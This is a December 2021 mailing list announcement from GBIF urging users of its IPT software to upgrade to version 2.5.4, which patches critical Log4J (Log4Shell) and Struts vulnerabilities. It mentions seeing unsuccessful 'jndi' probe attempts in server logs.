[IPT] IPT security update (Log4J / Log4Shell exploit)

Matthew Blissett mblissett at gbif.org
Sat Dec 11 09:55:35 UTC 2021


Dear IPT users,

We have released a new version of the IPT, version 2.5.4 [1]. This 
version contains fixes to critical security issues with the Struts and 
Log4J[2] libraries.

According to the press [3], the problem with the Log4J library 
vulnerability is being exploited by malicious users — and I can already 
see queries containing "jndi" in the web server logs for the IPTs GBIF 
hosts at cloud.gbif.org, although they are random attempts and would not 
succeed.

All users are highly encouraged to upgrade to this version as soon as 
possible.

As usual, upgrade and installation instructions are in the manual [1]. 
Please remember to check your data directory backup is working before 
starting the upgrade.

[1] https://ipt.gbif.org/manual/en/ipt/2.5/releases#2-5-4-december-2021

[2] https://www.lunasec.io/docs/blog/log4j-zero-day/

[3] 
https://www.theguardian.com/technology/2021/dec/10/software-flaw-most-critical-vulnerability-log-4-shell

Best regards,

Matthew




More information about the IPT mailing list